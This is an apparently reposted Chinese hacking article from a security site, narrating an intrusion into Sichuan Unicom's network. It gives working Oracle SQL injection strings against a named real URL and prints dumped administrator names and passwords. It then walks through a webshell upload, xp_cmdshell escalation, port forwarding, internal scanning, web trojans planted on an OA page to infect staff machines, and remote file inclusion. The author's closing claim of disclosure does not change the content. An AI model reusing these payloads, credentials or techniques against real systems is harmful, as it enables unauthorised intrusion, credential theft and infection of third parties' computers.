首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
入侵联通全过程
来源:vfocus.net 作者:Nicholas 发布时间:2010-05-24  

渗透联通之旅,以前入侵过四川联通.
今日再次看看.发现一个jsp页面的get连接.就忍不住的想测试
http://www.sc.chinaunicom.com/local/content.jsp?localid=9
先加上  and 1=1   , and 1=2 . 貌似有注入.
普遍情况下,JSP相对采用SYBASE,MYSQL,ORACLE数据库. 那就一个个测试吧.

当测试Dual表的时候返回正确了 And 0<>(select count(*) from dual)
说明是 Oracle数据库.  现在数据库已经弄清楚了,可以使用order by来测试字段了.
order by 10-- 返回错误.  接着order by 6的时候返回正确. order by 7返回错误.
说明6个字段. 现在构造查询语句. 其实跟MYSQL手工注入差不多
and  1=1 null,null,null,null,null,null from dual-- 返回错误页面.
然后把null加上单引号测试字符类型. 还是错误页面. 
还剩下一种常用数据类型. 那就是数字了.
and 1=2 union select 1,'2',3,'4',5,'6' from dual--
在新闻标题和新闻内容出现了"2"   已经爆出了数据库字段位置了.
先看看数据库版本吧.
and 1=2 union select 1,'(select banner from sys.v_$version where rownum=1)',3,'4',5,'6' from dual--
返回页面出现  Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
然后使用(select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual)来爆数据库用户名吧
用户名爆出来了CHINAUNICOM
接着通过logfile函数获取日志文件路径.(select member from v$logfile where rownum=1)
出现/oracle/oradata/uniscdb/redo03.log   看这个路径,说明不会是WIN系统平台.是LINUX或许UNIX或许其他的
玩过注入的朋友,都知道注入猜表都是 select * from [table] 那么来一个个测试.相当于盲注
或许有人会说MSSQL的多句查询在显错状态下可以直接爆出表名. 但是有拓展延伸性的.
接着就是ORACLE发挥自己强大之处的地方了.
and 1=2 union select 1,TABLE_NAME,3,'4',5,'6' from USER_TABLES--
出现了很多表
MOBILE_AREA SMS_DELIVER SMS_DELIVER_LOG SMS_REPORTMSG …………
经过5分钟查阅,终于找到管理员表了。
http://www.sc.chinaunicom.com/local/content.jsp?localid=9 and 1=2 union select 1,NAME,3,'4',5,'6' from UNICOM_USER--
管理员账号 123 kf_jlb sa sichuan zhangyl
接着NAME换成PASSWORD爆出密码
123 kf_jlb mb747576 sa
通过一些工具找到后台登陆的地方了。
http://www.sc.chinaunicom.com/manage/login.do
现在进去看看吧。
登陆成功。 既然进去了,就尝试拿拿shell吧. 
大家一定要开VPN.否则后果很严重.
通过新闻添加的NC 提交,拿到一个shell.继续渗透之路
首先看看系统版本吧. 
用uname命令.回显是 SUN OS 5.9
WEB路径 /bea/user_projects/domains/unicom_business/
因为系统版本无exploitz,估计本地溢出很渺茫
在 WEB上级目录发现一个OA_SYSTEM_DATASCRIP目录
进去看看吧,反正也不知道该如何是好.
人品真的很好,竟然让我找到一个jar数据封装包.
里面写着一台IP为 172.0.25.33的MSSQL服务器SA账号密码
有这个就好办了.连接上去,随便建立一个库,一个表一个字段
里面随便写个值,构造一个注入点放到四川联通WEB目录下.
拿起工具直接注射过去.获得一些信息.数据库版本 mssql2000
权限SA,用户DBO,数据库TEST,多句执行:YES,显错开启。
JSP+MSSQL敢用SA,第一次见。太犀利了。
直接用xp_cmdshell提权.竟然还真提起来了.转发3389失败了
问题来了.服务器是在172.0.25.X的内网.3389又连不上
正在想是不是3389给过滤了.因为netstat -an看了一下
MSSQL与几台119.6.253.X的几台服务器是监听状态
转发不行,干脆来点狠的.直接通过XP_CMDSHELL改了3389端口
因为是2003,不需要重启.继续做了端口转发.
然后我本机的htran有提示连接了.
打开mstsc连接 127.0.0.1:13389
出现了可爱的Windows 2003 datacenter Server登陆界面
进去以后在硬盘里面翻了一下,发现是一台专业数据服务器
输入ipconfig /all看了下。吓我一跳。
3个连接
192.168.50.4
172.0.25.33
10.0.30.42
这下估计有得渗透了,挂起X-SCAN先扫描192.168.50.X网段。
其中192.168.50.[39,43,44,49] 存在MSSQL SA空口令.轻松拿到权限.
其中192.168.50.[23,27]存在IIS写权限漏洞.直接用老兵工具拿到两个shell.
192.168.50,23 服务器上是联通秘书运营OA平台. COUNT目录下有个计数器.
每天有一些10.0.23.X-10.0.27.X的客户端登陆这个OA平台. 凭感觉断定这些是联通职员的工作客户端.
以前去中国移动交话费的时候,有几次不经意的看到营业厅的客户端上是XP系统,而且都没安装杀毒软件。
三款网页组合木马,先本地测试看看是否会造成客户端卡屏或者程序bug.
测试完成后,在OA首页挂了代码.果然是好RP.一小时过后,慢慢的有23 台肉鸡上线.
看了下远程桌面,好像也没什么特别的,只是开了中国联通业务WEB在线作业平台.可能是客服部门的吧.
在 192.168.50.39上开着cain,放那里没管它.
继续回到192.168.50.4上面做渗透. 拿起X-SCAN扫描172.0.25.X子段.
扫到一台LINUX 172.0.25.68上面有个网站是默认的IP URL.index.php存在remote include file漏洞
在数据库服务器安装了php环境,放了一个php马.然后再 172.0.25.68上远程包含利用成功获得shell.
进去后才知道是四川联通的客户信息管理系统.好淫荡的想法来了.也是此次渗透最关键的地方.
马上得到oracle账号密码,连接上去读取管理员账号密码.结果我淫荡的想法被破灭了
网站是C/S模式的,有独立HTTPS个人证书.也就意味着HASH也是无法破解的,因为管理用户是独立的HASH SID.
返回到192.168.50.39上面,抓到一些hash和一些明文密码.试着在线破解.有几个密码破解出来了登陆上去继续提权.渗透到这个地方告一段落.
这次渗透总共获得65台服务器权限,包括2个域管理权限.
内网安全一塌糊涂,特别是群集的网段需要特别注意密码安全,否则一击即中.
在入侵中,需要多出运用新的思路.翻看教程没有错,但是完全照抄就是SB了.

 

在本次入侵检测后,我已经通知四川联通技术部门处理这些安全漏洞。
植入的木马和后门已经协助四川联通技术部删除.在这里感谢sLock提供的三款网页木马。
请各位看官要切记,善于利用自己的技术来帮助他人,不要非法入侵做一些损人不利己的事情。
如有转载此文,请注明原创文章作者:Nicholas  QQ:97555711. 请尊重他人劳动成果.


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·攻破雷池最新补丁技术
·看黑客是怎样入侵防注入代码的
·百度游戏的一些安全隐患
·测试一下录像效果视频,顺带说一
·Dump freebsd dir entries using
·QQ2009 本地聊天记录的查看
·寻找绝对隐蔽的后门的办法
·入侵本地Mac OS X方针与技巧
·最新DVBBS8.0以上版本后台拿webs
·xxbing的一次日站过程
·重建sp_makewebtask存储过程获取
·Uchome <=2.0 后台GetWebShell漏
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved